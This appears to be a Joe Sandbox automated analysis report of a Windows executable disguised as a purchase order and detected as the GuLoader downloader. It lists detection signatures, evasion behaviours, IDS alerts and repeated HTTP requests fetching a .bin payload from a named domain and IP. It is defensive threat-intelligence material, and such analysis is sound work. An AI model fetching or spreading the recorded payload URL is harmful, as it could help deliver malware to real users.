Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-10212024168877 PNG2023-W101.exe

Overview

General Information

Sample name:PO-10212024168877 PNG2023-W101.exe
Analysis ID:1544856
MD5:e7504a48d78545ef459890b5c36b6b17
SHA1:7dd9b7b12c2a58f83235edd771801bae8b94b6f3
SHA256:7d0590445da76f1149aefce04bc517b15b330871cd3bd8c196a032e28588ee9e
Tags:exeuser-threatcat_ch
Infos:

Detection

GuLoader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3906224944.0000000003648000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000000.00000002.2614036861.0000000006688000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-29T20:37:35.807943+010028032702Potentially Bad Traffic192.168.2.84997662.215.181.250443TCP
      2024-10-29T20:37:37.732080+010028032702Potentially Bad Traffic192.168.2.84997762.215.181.250443TCP
      2024-10-29T20:37:39.641205+010028032702Potentially Bad Traffic192.168.2.84997862.215.181.250443TCP
      2024-10-29T20:37:41.591458+010028032702Potentially Bad Traffic192.168.2.84997962.215.181.250443TCP
      2024-10-29T20:37:43.528233+010028032702Potentially Bad Traffic192.168.2.84998062.215.181.250443TCP
      2024-10-29T20:37:45.434865+010028032702Potentially Bad Traffic192.168.2.84998162.215.181.250443TCP
      2024-10-29T20:37:47.357938+010028032702Potentially Bad Traffic192.168.2.84998262.215.181.250443TCP
      2024-10-29T20:37:49.306233+010028032702Potentially Bad Traffic192.168.2.84998362.215.181.250443TCP
      2024-10-29T20:37:51.423389+010028032702Potentially Bad Traffic192.168.2.84998462.215.181.250443TCP
      2024-10-29T20:37:53.374891+010028032702Potentially Bad Traffic192.168.2.84998562.215.181.250443TCP
      2024-10-29T20:37:55.330913+010028032702Potentially Bad Traffic192.168.2.84998662.215.181.250443TCP
      2024-10-29T20:37:57.283182+010028032702Potentially Bad Traffic192.168.2.84998762.215.181.250443TCP
      2024-10-29T20:37:59.264188+010028032702Potentially Bad Traffic192.168.2.84998862.215.181.250443TCP
      2024-10-29T20:38:01.187500+010028032702Potentially Bad Traffic192.168.2.84998962.215.181.250443TCP
      2024-10-29T20:38:03.399785+010028032702Potentially Bad Traffic192.168.2.84999062.215.181.250443TCP
      2024-10-29T20:38:06.396302+010028032702Potentially Bad Traffic192.168.2.84999162.215.181.250443TCP
      2024-10-29T20:38:08.666816+010028032702Potentially Bad Traffic192.168.2.84999262.215.181.250443TCP
      2024-10-29T20:38:10.646802+010028032702Potentially Bad Traffic192.168.2.84999362.215.181.250443TCP
      2024-10-29T20:38:12.581802+010028032702Potentially Bad Traffic192.168.2.84999462.215.181.250443TCP
      2024-10-29T20:38:14.525452+010028032702Potentially Bad Traffic192.168.2.84999562.215.181.250443TCP
      2024-10-29T20:38:16.488780+010028032702Potentially Bad Traffic192.168.2.84999662.215.181.250443TCP
      2024-10-29T20:38:18.423095+010028032702Potentially Bad Traffic192.168.2.84999762.215.181.250443TCP
      2024-10-29T20:38:21.363149+010028032702Potentially Bad Traffic192.168.2.84999862.215.181.250443TCP
      2024-10-29T20:38:23.299165+010028032702Potentially Bad Traffic192.168.2.84999962.215.181.250443TCP
      2024-10-29T20:38:25.234889+010028032702Potentially Bad Traffic192.168.2.85000062.215.181.250443TCP
      2024-10-29T20:38:27.329904+010028032702Potentially Bad Traffic192.168.2.85000162.215.181.250443TCP
      2024-10-29T20:38:29.261822+010028032702Potentially Bad Traffic192.168.2.85000262.215.181.250443TCP
      2024-10-29T20:38:31.728462+010028032702Potentially Bad Traffic192.168.2.85000362.215.181.250443TCP
      2024-10-29T20:38:33.685339+010028032702Potentially Bad Traffic192.168.2.85000462.215.181.250443TCP
      2024-10-29T20:38:35.854783+010028032702Potentially Bad Traffic192.168.2.85000562.215.181.250443TCP
      2024-10-29T20:38:37.784102+010028032702Potentially Bad Traffic192.168.2.85000662.215.181.250443TCP
      2024-10-29T20:38:39.728615+010028032702Potentially Bad Traffic192.168.2.85000762.215.181.250443TCP
      2024-10-29T20:38:41.651229+010028032702Potentially Bad Traffic192.168.2.85000862.215.181.250443TCP
      2024-10-29T20:38:43.595814+010028032702Potentially Bad Traffic192.168.2.85000962.215.181.250443TCP
      2024-10-29T20:38:45.551710+010028032702Potentially Bad Traffic192.168.2.85001062.215.181.250443TCP
      2024-10-29T20:38:47.477000+010028032702Potentially Bad Traffic192.168.2.85001162.215.181.250443TCP
      2024-10-29T20:38:49.486771+010028032702Potentially Bad Traffic192.168.2.85001262.215.181.250443TCP
      2024-10-29T20:38:51.395703+010028032702Potentially Bad Traffic192.168.2.85001362.215.181.250443TCP
      2024-10-29T20:38:53.304632+010028032702Potentially Bad Traffic192.168.2.85001462.215.181.250443TCP
      2024-10-29T20:38:55.324467+010028032702Potentially Bad Traffic192.168.2.85001562.215.181.250443TCP
      2024-10-29T20:38:57.221442+010028032702Potentially Bad Traffic192.168.2.85001662.215.181.250443TCP
      2024-10-29T20:38:59.170316+010028032702Potentially Bad Traffic192.168.2.85001762.215.181.250443TCP
      2024-10-29T20:39:01.109922+010028032702Potentially Bad Traffic192.168.2.85001862.215.181.250443TCP
      2024-10-29T20:39:03.053415+010028032702Potentially Bad Traffic192.168.2.85001962.215.181.250443TCP
      2024-10-29T20:39:04.971362+010028032702Potentially Bad Traffic192.168.2.85002062.215.181.250443TCP
      2024-10-29T20:39:06.901687+010028032702Potentially Bad Traffic192.168.2.85002162.215.181.250443TCP
      2024-10-29T20:39:08.829870+010028032702Potentially Bad Traffic192.168.2.85002262.215.181.250443TCP
      2024-10-29T20:39:10.762910+010028032702Potentially Bad Traffic192.168.2.85002362.215.181.250443TCP
      2024-10-29T20:39:12.668445+010028032702Potentially Bad Traffic192.168.2.85002462.215.181.250443TCP
      2024-10-29T20:39:14.647973+010028032702Potentially Bad Traffic192.168.2.85002562.215.181.250443TCP
      2024-10-29T20:39:16.576285+010028032702Potentially Bad Traffic192.168.2.85002662.215.181.250443TCP
      2024-10-29T20:39:19.269945+010028032702Potentially Bad Traffic192.168.2.85002762.215.181.250443TCP
      2024-10-29T20:39:21.199975+010028032702Potentially Bad Traffic192.168.2.85002862.215.181.250443TCP
      2024-10-29T20:39:23.130461+010028032702Potentially Bad Traffic192.168.2.85002962.215.181.250443TCP
      2024-10-29T20:39:25.031946+010028032702Potentially Bad Traffic192.168.2.85003062.215.181.250443TCP
      2024-10-29T20:39:27.014424+010028032702Potentially Bad Traffic192.168.2.85003162.215.181.250443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: PO-10212024168877 PNG2023-W101.exeReversingLabs: Detection: 52%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for sample
      Source: PO-10212024168877 PNG2023-W101.exeJoe Sandbox ML: detected
      Source: PO-10212024168877 PNG2023-W101.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49976 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49977 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49983 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49984 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49985 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49987 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49990 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49995 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49996 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:49997 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:50008 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:50009 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:50010 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 62.215.181.250:443 -> 192.168.2.8:50027 version: TLS 1.2
      Source: PO-10212024168877 PNG2023-W101.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeCode function: 0_2_00406010 FindFirstFileA,FindClose,0_2_00406010
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeCode function: 0_2_004055AE GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055AE
      Source: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49979 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49993 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49981 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49984 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49998 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50004 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50002 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49986 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49989 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49988 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49985 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49992 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49980 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50003 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49990 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49978 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49994 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49996 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49991 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49982 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50000 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49999 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49983 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49997 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50006 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49987 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49976 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50008 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50005 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50019 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50011 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50010 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50025 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50012 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50018 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50020 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50028 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50023 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50013 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50024 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50009 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50017 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50026 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50014 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50021 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50007 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50030 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50029 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49995 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50016 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49977 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50001 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50022 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50015 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50027 -> 62.215.181.250:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:50031 -> 62.215.181.250:443
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /admin/controller/extension/extension/zXcMABFvBCAfEn173.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: designcirclekw.comCache-Control: no-cache
